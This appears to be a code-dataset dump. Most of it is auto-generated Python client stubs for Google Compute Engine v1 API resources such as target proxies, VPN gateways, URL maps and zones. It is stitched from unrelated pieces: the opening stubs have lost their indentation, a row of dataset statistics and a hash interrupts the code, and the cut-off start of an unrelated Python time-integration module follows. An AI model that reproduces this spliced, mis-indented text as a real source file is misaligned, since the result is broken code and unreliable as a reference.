(Operation) The response message.
"""
config = self.GetMethodConfig('SetBackendService')
return self._RunMethod(
config, request, global_params=global_params)
SetBackendService.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetSslProxies.setBackendService',
ordered_params=[u'project', u'targetSslProxy'],
path_params=[u'project', u'targetSslProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}/setBackendService',
request_field=u'targetSslProxiesSetBackendServiceRequest',
request_type_name=u'ComputeTargetSslProxiesSetBackendServiceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetProxyHeader(self, request, global_params=None):
    """Changes the ProxyHeaderType for TargetSslProxy.

    Args:
      request: (ComputeTargetSslProxiesSetProxyHeaderRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    # Single-expression dispatch through the inherited request machinery.
    return self._RunMethod(
        self.GetMethodConfig('SetProxyHeader'), request,
        global_params=global_params)

SetProxyHeader.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.targetSslProxies.setProxyHeader',
    ordered_params=[u'project', u'targetSslProxy'],
    path_params=[u'project', u'targetSslProxy'],
    query_params=[],
    relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}/setProxyHeader',
    request_field=u'targetSslProxiesSetProxyHeaderRequest',
    request_type_name=u'ComputeTargetSslProxiesSetProxyHeaderRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetSslCertificates(self, request, global_params=None):
    """Changes SslCertificates for TargetSslProxy.

    Args:
      request: (ComputeTargetSslProxiesSetSslCertificatesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    # Look up the declarative descriptor first, then delegate the call.
    descriptor = self.GetMethodConfig('SetSslCertificates')
    return self._RunMethod(descriptor, request,
                           global_params=global_params)

SetSslCertificates.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.targetSslProxies.setSslCertificates',
    ordered_params=[u'project', u'targetSslProxy'],
    path_params=[u'project', u'targetSslProxy'],
    query_params=[],
    relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}/setSslCertificates',
    request_field=u'targetSslProxiesSetSslCertificatesRequest',
    request_type_name=u'ComputeTargetSslProxiesSetSslCertificatesRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
class TargetTcpProxiesService(base_api.BaseApiService):
    """Service class for the targetTcpProxies resource."""

    # NOTE: auto-generated apitools service stub. Each method is a thin
    # dispatcher paired with a lazily evaluated ApiMethodInfo describing
    # the REST wire format; these literals must stay in sync with the
    # Compute Engine v1 discovery document.
    _NAME = u'targetTcpProxies'

    def __init__(self, client):
        super(ComputeV1.TargetTcpProxiesService, self).__init__(client)
        # This resource exposes no media-upload endpoints.
        self._upload_configs = {
            }

    def Delete(self, request, global_params=None):
        """Deletes the specified TargetTcpProxy resource.

        Args:
          request: (ComputeTargetTcpProxiesDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Delete')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Descriptor consumed lazily by base_api when the method above is invoked.
    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.targetTcpProxies.delete',
        ordered_params=[u'project', u'targetTcpProxy'],
        path_params=[u'project', u'targetTcpProxy'],
        query_params=[],
        relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}',
        request_field='',
        request_type_name=u'ComputeTargetTcpProxiesDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified TargetTcpProxy resource. Get a list of available target TCP proxies by making a list() request.

        Args:
          request: (ComputeTargetTcpProxiesGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (TargetTcpProxy) The response message.
        """
        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.targetTcpProxies.get',
        ordered_params=[u'project', u'targetTcpProxy'],
        path_params=[u'project', u'targetTcpProxy'],
        query_params=[],
        relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}',
        request_field='',
        request_type_name=u'ComputeTargetTcpProxiesGetRequest',
        response_type_name=u'TargetTcpProxy',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a TargetTcpProxy resource in the specified project using the data included in the request.

        Args:
          request: (ComputeTargetTcpProxiesInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Insert')
        return self._RunMethod(
            config, request, global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.targetTcpProxies.insert',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/targetTcpProxies',
        request_field=u'targetTcpProxy',
        request_type_name=u'ComputeTargetTcpProxiesInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of TargetTcpProxy resources available to the specified project.

        Args:
          request: (ComputeTargetTcpProxiesListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (TargetTcpProxyList) The response message.
        """
        config = self.GetMethodConfig('List')
        return self._RunMethod(
            config, request, global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.targetTcpProxies.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/targetTcpProxies',
        request_field='',
        request_type_name=u'ComputeTargetTcpProxiesListRequest',
        response_type_name=u'TargetTcpProxyList',
        supports_download=False,
    )

    def SetBackendService(self, request, global_params=None):
        """Changes the BackendService for TargetTcpProxy.

        Args:
          request: (ComputeTargetTcpProxiesSetBackendServiceRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('SetBackendService')
        return self._RunMethod(
            config, request, global_params=global_params)

    SetBackendService.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.targetTcpProxies.setBackendService',
        ordered_params=[u'project', u'targetTcpProxy'],
        path_params=[u'project', u'targetTcpProxy'],
        query_params=[],
        relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}/setBackendService',
        request_field=u'targetTcpProxiesSetBackendServiceRequest',
        request_type_name=u'ComputeTargetTcpProxiesSetBackendServiceRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def SetProxyHeader(self, request, global_params=None):
        """Changes the ProxyHeaderType for TargetTcpProxy.

        Args:
          request: (ComputeTargetTcpProxiesSetProxyHeaderRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('SetProxyHeader')
        return self._RunMethod(
            config, request, global_params=global_params)

    SetProxyHeader.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.targetTcpProxies.setProxyHeader',
        ordered_params=[u'project', u'targetTcpProxy'],
        path_params=[u'project', u'targetTcpProxy'],
        query_params=[],
        relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}/setProxyHeader',
        request_field=u'targetTcpProxiesSetProxyHeaderRequest',
        request_type_name=u'ComputeTargetTcpProxiesSetProxyHeaderRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class TargetVpnGatewaysService(base_api.BaseApiService):
    """Service class for the targetVpnGateways resource."""

    # NOTE: auto-generated apitools service stub. Per-method ApiMethodInfo
    # objects encode the REST wire format; keep them in sync with the
    # Compute Engine v1 discovery document.
    _NAME = u'targetVpnGateways'

    def __init__(self, client):
        super(ComputeV1.TargetVpnGatewaysService, self).__init__(client)
        # This resource exposes no media-upload endpoints.
        self._upload_configs = {
            }

    def AggregatedList(self, request, global_params=None):
        """Retrieves an aggregated list of target VPN gateways.

        Args:
          request: (ComputeTargetVpnGatewaysAggregatedListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (TargetVpnGatewayAggregatedList) The response message.
        """
        config = self.GetMethodConfig('AggregatedList')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Descriptor consumed lazily by base_api when the method above is invoked.
    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.targetVpnGateways.aggregatedList',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/targetVpnGateways',
        request_field='',
        request_type_name=u'ComputeTargetVpnGatewaysAggregatedListRequest',
        response_type_name=u'TargetVpnGatewayAggregatedList',
        supports_download=False,
    )

    def Delete(self, request, global_params=None):
        """Deletes the specified target VPN gateway.

        Args:
          request: (ComputeTargetVpnGatewaysDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Delete')
        return self._RunMethod(
            config, request, global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.targetVpnGateways.delete',
        ordered_params=[u'project', u'region', u'targetVpnGateway'],
        path_params=[u'project', u'region', u'targetVpnGateway'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/targetVpnGateways/{targetVpnGateway}',
        request_field='',
        request_type_name=u'ComputeTargetVpnGatewaysDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified target VPN gateway. Get a list of available target VPN gateways by making a list() request.

        Args:
          request: (ComputeTargetVpnGatewaysGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (TargetVpnGateway) The response message.
        """
        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.targetVpnGateways.get',
        ordered_params=[u'project', u'region', u'targetVpnGateway'],
        path_params=[u'project', u'region', u'targetVpnGateway'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/targetVpnGateways/{targetVpnGateway}',
        request_field='',
        request_type_name=u'ComputeTargetVpnGatewaysGetRequest',
        response_type_name=u'TargetVpnGateway',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a target VPN gateway in the specified project and region using the data included in the request.

        Args:
          request: (ComputeTargetVpnGatewaysInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Insert')
        return self._RunMethod(
            config, request, global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.targetVpnGateways.insert',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/targetVpnGateways',
        request_field=u'targetVpnGateway',
        request_type_name=u'ComputeTargetVpnGatewaysInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves a list of target VPN gateways available to the specified project and region.

        Args:
          request: (ComputeTargetVpnGatewaysListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (TargetVpnGatewayList) The response message.
        """
        config = self.GetMethodConfig('List')
        return self._RunMethod(
            config, request, global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.targetVpnGateways.list',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/regions/{region}/targetVpnGateways',
        request_field='',
        request_type_name=u'ComputeTargetVpnGatewaysListRequest',
        response_type_name=u'TargetVpnGatewayList',
        supports_download=False,
    )
class UrlMapsService(base_api.BaseApiService):
    """Service class for the urlMaps resource."""

    # NOTE: auto-generated apitools service stub. Per-method ApiMethodInfo
    # objects encode the REST wire format; keep them in sync with the
    # Compute Engine v1 discovery document.
    _NAME = u'urlMaps'

    def __init__(self, client):
        super(ComputeV1.UrlMapsService, self).__init__(client)
        # This resource exposes no media-upload endpoints.
        self._upload_configs = {
            }

    def Delete(self, request, global_params=None):
        """Deletes the specified UrlMap resource.

        Args:
          request: (ComputeUrlMapsDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Delete')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Descriptor consumed lazily by base_api when the method above is invoked.
    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.urlMaps.delete',
        ordered_params=[u'project', u'urlMap'],
        path_params=[u'project', u'urlMap'],
        query_params=[],
        relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
        request_field='',
        request_type_name=u'ComputeUrlMapsDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified UrlMap resource. Get a list of available URL maps by making a list() request.

        Args:
          request: (ComputeUrlMapsGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (UrlMap) The response message.
        """
        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.urlMaps.get',
        ordered_params=[u'project', u'urlMap'],
        path_params=[u'project', u'urlMap'],
        query_params=[],
        relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
        request_field='',
        request_type_name=u'ComputeUrlMapsGetRequest',
        response_type_name=u'UrlMap',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a UrlMap resource in the specified project using the data included in the request.

        Args:
          request: (ComputeUrlMapsInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Insert')
        return self._RunMethod(
            config, request, global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.urlMaps.insert',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/urlMaps',
        request_field=u'urlMap',
        request_type_name=u'ComputeUrlMapsInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def InvalidateCache(self, request, global_params=None):
        """Initiates a cache invalidation operation, invalidating the specified path, scoped to the specified UrlMap.

        Args:
          request: (ComputeUrlMapsInvalidateCacheRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('InvalidateCache')
        return self._RunMethod(
            config, request, global_params=global_params)

    InvalidateCache.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.urlMaps.invalidateCache',
        ordered_params=[u'project', u'urlMap'],
        path_params=[u'project', u'urlMap'],
        query_params=[],
        relative_path=u'projects/{project}/global/urlMaps/{urlMap}/invalidateCache',
        request_field=u'cacheInvalidationRule',
        request_type_name=u'ComputeUrlMapsInvalidateCacheRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of UrlMap resources available to the specified project.

        Args:
          request: (ComputeUrlMapsListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (UrlMapList) The response message.
        """
        config = self.GetMethodConfig('List')
        return self._RunMethod(
            config, request, global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.urlMaps.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/urlMaps',
        request_field='',
        request_type_name=u'ComputeUrlMapsListRequest',
        response_type_name=u'UrlMapList',
        supports_download=False,
    )

    def Patch(self, request, global_params=None):
        """Patches the specified UrlMap resource with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.

        Args:
          request: (ComputeUrlMapsPatchRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Patch')
        return self._RunMethod(
            config, request, global_params=global_params)

    Patch.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'PATCH',
        method_id=u'compute.urlMaps.patch',
        ordered_params=[u'project', u'urlMap'],
        path_params=[u'project', u'urlMap'],
        query_params=[],
        relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
        request_field=u'urlMapResource',
        request_type_name=u'ComputeUrlMapsPatchRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Update(self, request, global_params=None):
        """Updates the specified UrlMap resource with the data included in the request.

        Args:
          request: (ComputeUrlMapsUpdateRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Update')
        return self._RunMethod(
            config, request, global_params=global_params)

    Update.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'PUT',
        method_id=u'compute.urlMaps.update',
        ordered_params=[u'project', u'urlMap'],
        path_params=[u'project', u'urlMap'],
        query_params=[],
        relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
        request_field=u'urlMapResource',
        request_type_name=u'ComputeUrlMapsUpdateRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Validate(self, request, global_params=None):
        """Runs static validation for the UrlMap. In particular, the tests of the provided UrlMap will be run. Calling this method does NOT create the UrlMap.

        Args:
          request: (ComputeUrlMapsValidateRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (UrlMapsValidateResponse) The response message.
        """
        config = self.GetMethodConfig('Validate')
        return self._RunMethod(
            config, request, global_params=global_params)

    Validate.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.urlMaps.validate',
        ordered_params=[u'project', u'urlMap'],
        path_params=[u'project', u'urlMap'],
        query_params=[],
        relative_path=u'projects/{project}/global/urlMaps/{urlMap}/validate',
        request_field=u'urlMapsValidateRequest',
        request_type_name=u'ComputeUrlMapsValidateRequest',
        response_type_name=u'UrlMapsValidateResponse',
        supports_download=False,
    )
class VpnTunnelsService(base_api.BaseApiService):
    """Service class for the vpnTunnels resource."""

    # NOTE: auto-generated apitools service stub. Per-method ApiMethodInfo
    # objects encode the REST wire format; keep them in sync with the
    # Compute Engine v1 discovery document.
    _NAME = u'vpnTunnels'

    def __init__(self, client):
        super(ComputeV1.VpnTunnelsService, self).__init__(client)
        # This resource exposes no media-upload endpoints.
        self._upload_configs = {
            }

    def AggregatedList(self, request, global_params=None):
        """Retrieves an aggregated list of VPN tunnels.

        Args:
          request: (ComputeVpnTunnelsAggregatedListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (VpnTunnelAggregatedList) The response message.
        """
        config = self.GetMethodConfig('AggregatedList')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Descriptor consumed lazily by base_api when the method above is invoked.
    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.vpnTunnels.aggregatedList',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/vpnTunnels',
        request_field='',
        request_type_name=u'ComputeVpnTunnelsAggregatedListRequest',
        response_type_name=u'VpnTunnelAggregatedList',
        supports_download=False,
    )

    def Delete(self, request, global_params=None):
        """Deletes the specified VpnTunnel resource.

        Args:
          request: (ComputeVpnTunnelsDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Delete')
        return self._RunMethod(
            config, request, global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.vpnTunnels.delete',
        ordered_params=[u'project', u'region', u'vpnTunnel'],
        path_params=[u'project', u'region', u'vpnTunnel'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/vpnTunnels/{vpnTunnel}',
        request_field='',
        request_type_name=u'ComputeVpnTunnelsDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified VpnTunnel resource. Get a list of available VPN tunnels by making a list() request.

        Args:
          request: (ComputeVpnTunnelsGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (VpnTunnel) The response message.
        """
        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.vpnTunnels.get',
        ordered_params=[u'project', u'region', u'vpnTunnel'],
        path_params=[u'project', u'region', u'vpnTunnel'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/vpnTunnels/{vpnTunnel}',
        request_field='',
        request_type_name=u'ComputeVpnTunnelsGetRequest',
        response_type_name=u'VpnTunnel',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a VpnTunnel resource in the specified project and region using the data included in the request.

        Args:
          request: (ComputeVpnTunnelsInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Insert')
        return self._RunMethod(
            config, request, global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.vpnTunnels.insert',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/vpnTunnels',
        request_field=u'vpnTunnel',
        request_type_name=u'ComputeVpnTunnelsInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves a list of VpnTunnel resources contained in the specified project and region.

        Args:
          request: (ComputeVpnTunnelsListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (VpnTunnelList) The response message.
        """
        config = self.GetMethodConfig('List')
        return self._RunMethod(
            config, request, global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.vpnTunnels.list',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/regions/{region}/vpnTunnels',
        request_field='',
        request_type_name=u'ComputeVpnTunnelsListRequest',
        response_type_name=u'VpnTunnelList',
        supports_download=False,
    )
class ZoneOperationsService(base_api.BaseApiService):
    """Service class for the zoneOperations resource."""

    # NOTE: auto-generated apitools service stub. Per-method ApiMethodInfo
    # objects encode the REST wire format; keep them in sync with the
    # Compute Engine v1 discovery document.
    _NAME = u'zoneOperations'

    def __init__(self, client):
        super(ComputeV1.ZoneOperationsService, self).__init__(client)
        # This resource exposes no media-upload endpoints.
        self._upload_configs = {
            }

    def Delete(self, request, global_params=None):
        """Deletes the specified zone-specific Operations resource.

        Args:
          request: (ComputeZoneOperationsDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (ComputeZoneOperationsDeleteResponse) The response message.
        """
        config = self.GetMethodConfig('Delete')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Descriptor consumed lazily by base_api. path_params is alphabetized
    # while ordered_params preserves the discovery-document ordering.
    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.zoneOperations.delete',
        ordered_params=[u'project', u'zone', u'operation'],
        path_params=[u'operation', u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/operations/{operation}',
        request_field='',
        request_type_name=u'ComputeZoneOperationsDeleteRequest',
        response_type_name=u'ComputeZoneOperationsDeleteResponse',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Retrieves the specified zone-specific Operations resource.

        Args:
          request: (ComputeZoneOperationsGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.zoneOperations.get',
        ordered_params=[u'project', u'zone', u'operation'],
        path_params=[u'operation', u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/operations/{operation}',
        request_field='',
        request_type_name=u'ComputeZoneOperationsGetRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves a list of Operation resources contained within the specified zone.

        Args:
          request: (ComputeZoneOperationsListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (OperationList) The response message.
        """
        config = self.GetMethodConfig('List')
        return self._RunMethod(
            config, request, global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.zoneOperations.list',
        ordered_params=[u'project', u'zone'],
        path_params=[u'project', u'zone'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/zones/{zone}/operations',
        request_field='',
        request_type_name=u'ComputeZoneOperationsListRequest',
        response_type_name=u'OperationList',
        supports_download=False,
    )
class ZonesService(base_api.BaseApiService):
    """Service class for the zones resource."""

    # NOTE: auto-generated apitools service stub. Per-method ApiMethodInfo
    # objects encode the REST wire format; keep them in sync with the
    # Compute Engine v1 discovery document.
    _NAME = u'zones'

    def __init__(self, client):
        super(ComputeV1.ZonesService, self).__init__(client)
        # This resource exposes no media-upload endpoints.
        self._upload_configs = {
            }

    def Get(self, request, global_params=None):
        """Returns the specified Zone resource. Get a list of available zones by making a list() request.

        Args:
          request: (ComputeZonesGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Zone) The response message.
        """
        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Descriptor consumed lazily by base_api when the method above is invoked.
    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.zones.get',
        ordered_params=[u'project', u'zone'],
        path_params=[u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}',
        request_field='',
        request_type_name=u'ComputeZonesGetRequest',
        response_type_name=u'Zone',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of Zone resources available to the specified project.

        Args:
          request: (ComputeZonesListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (ZoneList) The response message.
        """
        config = self.GetMethodConfig('List')
        return self._RunMethod(
            config, request, global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.zones.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/zones',
        request_field='',
        request_type_name=u'ComputeZonesListRequest',
        response_type_name=u'ZoneList',
        supports_download=False,
    )
| 41.384777 | 592 | 0.693722 | 34,355 | 334,389 | 6.574647 | 0.033067 | 0.061362 | 0.048452 | 0.021118 | 0.787061 | 0.777715 | 0.753188 | 0.727585 | 0.716459 | 0.67849 | 0 | 0.000499 | 0.208694 | 334,389 | 8,079 | 593 | 41.3899 | 0.853124 | 0.278391 | 0 | 0.679895 | 1 | 0 | 0.248226 | 0.161006 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067687 | false | 0 | 0.000403 | 0 | 0.137994 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13e72dcf51f4a086648c9a363f270e1aa222a8a0 | 27,947 | py | Python | mrpy/discretization/ARK_ESDIRK3_2I_4L_2_new.py | marc-nguessan/mrpy | 6fb0bce485234a45bb863f71bc2bdf0a22014de3 | [
"BSD-3-Clause"
] | 2 | 2020-01-06T10:48:44.000Z | 2020-01-09T20:07:08.000Z | mrpy/discretization/ARK_ESDIRK3_2I_4L_2_new.py | marc-nguessan/mrpy | 6fb0bce485234a45bb863f71bc2bdf0a22014de3 | [
"BSD-3-Clause"
] | 1 | 2020-01-09T20:08:50.000Z | 2020-01-09T20:11:20.000Z | mrpy/discretization/ARK_ESDIRK3_2I_4L_2_new.py | marc-nguessan/mrpy | 6fb0bce485234a45bb863f71bc2bdf0a22014de3 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function, division
"""The temporal-modules contain the functions needed to comute the advancement in time
of the physical variables simulated. We need a specific temporal scheme to
advance a system of variables. Here, each scheme is implemented in a class. The
class is supposed to be instantiated as a "time-integrator" object in the main
module used to run the simulation. This instance then uses its procedure
attributes to advance the variables defined in the main module. All of the
spatial operations on the variables are devised via the spatial_discretization
operators, so that we have a data abstraction barrier between the procedures
designed here, and the specific data implementation of the discrete variables.
This is done to increase the modularity of this code: as long as we have a valid
spatial_discretization module, we can use this module to advance variables in
time.
Each scheme class inherits from the BaseScheme class. This class is initiated
for now with the veloicty and the pressure, but may change if we need to add
